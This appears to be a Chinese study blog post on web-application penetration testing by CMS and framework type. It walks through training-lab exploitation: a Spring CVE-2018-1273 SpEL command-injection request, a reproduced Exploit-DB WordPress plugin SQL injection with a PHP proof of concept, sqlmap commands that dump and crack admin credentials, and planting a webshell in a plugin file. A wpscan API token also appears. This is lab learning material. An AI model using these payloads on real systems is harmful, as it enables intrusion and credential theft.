神出鬼没的Enderman

漏洞发现-WEB应用之漏洞探针类型利用修复

原理分析

1. 已知 CMS

• 如常见的 dedecms.discuz,wordpress 等源码结构，这种一般采用非框架类开发，但也有少部分采用的是框架类开发，针对此类源码程序的安全检测，我们要利用公开的漏洞进行测试，如不存在可采用白盒代码审计自行挖掘。（1.在漏洞平台如seebug、cnvd搜索关键字2.使用工具框架如cmsscan、wpscan3.代码审计（函数，功能，框架三个方面））

2. 开发框架

• 如常见的 thinkphp，spring,flask 等开发的源码程序，这种源码程序正常的安全测试思路：先获取对应的开发框架信息(名字，版本)，通过公开的框架类安全问题进行测试，如不存在可采用白盒代码审计自行挖掘。

3. 未知 CMS

• 如常见的企业或个人内部程序源码，也可以是某 CMS 二次开发的源码结构，针对此类的源码程序测试思路：能识别二次开发就按已知 CMS 思路进行，不能确定二次开发的话可以采用常规综合类扫描工具或脚本进行探针，也可以采用人工探针（功能点，参数，盲猜），同样在有源码的情况下也可以进行代码审计自行挖掘。

开发框架类源码渗透测试

ThinkPHP

• https://fofa.info/
• ThinkPHP_getshell.rar

尝试使用fofa寻找相同网站

打开页面后查看发现和课程上提到的网站相似

报错信息提示是thinkphp的框架

没有检测到漏洞

spring框架的漏洞

• https://vulhub.org/#/environments/spring/CVE-2018-1273/

启动漏洞环境

根据提示进入靶场

尝试用给出的payload修改后进行攻击

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.50.10:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://192.168.50.10:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

攻击之后进入容器查看,可以利用该命令注入进行反弹shell

wordpress渗透测试

• https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

打开靶场根据提示使用wpscan进行扫描

wpscan --url http://124.70.71.251:40807/ --api-token    bieDbQWesQYEt2aesWJt2sDEE910sw3H3ep7dxlC3rc

发现sql注入漏洞

根据给出的信息查看漏洞利用过程

• https://www.exploit-db.com/exploits/24552

# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork: 
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4



Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!'); 
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


So let's take a look in the DB

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)


Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1 
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive


And the result is:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================


# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4


Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!'); 
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.

A simple POC is made in php.

<?PHP

define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
for($i=0;$i<1;$i++) lvlup();

function lvlup(){
    global $url;
    $header = "GET ".URL." HTTP/1.1 \r\n";
    $header.= "Host: ".$url['host']."\r\n";
    $header.= "Accept-Encoding: gzip, deflate \r\n";
    $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
    $header.= "Connection: close \r\n\r\n";
    $socket  = socket_create(AF_INET, SOCK_STREAM,  SOL_TCP);
    socket_connect($socket,$url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}

?> 

尝试利用sqlmap进行注入测试

sqlmap -u "http://124.70.71.251:40807/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_"

利用sqlmap获取到用户名和密码

sqlmap -u "http://124.70.71.251:40807/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_" -D test -T wp_users --dump

sqlmap已经将密文解密12qwaszx

+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                                     | user_email      | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$Bj8Pp.mH8GIjcXQqp1ZuyRw7i4oV72. (12qwaszx) | admin@admin.com | admin      | 0           | admin        | admin         | 2013-07-07 02:56:14 | <blank>             |
+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+

尝试登录

admin
12qwaszx

在插件的位置写入一句话木马

使用菜刀进行连接

#菜刀地址
http://124.70.71.251:40807/wp-content/plugins/comment-rating/comment-rating.php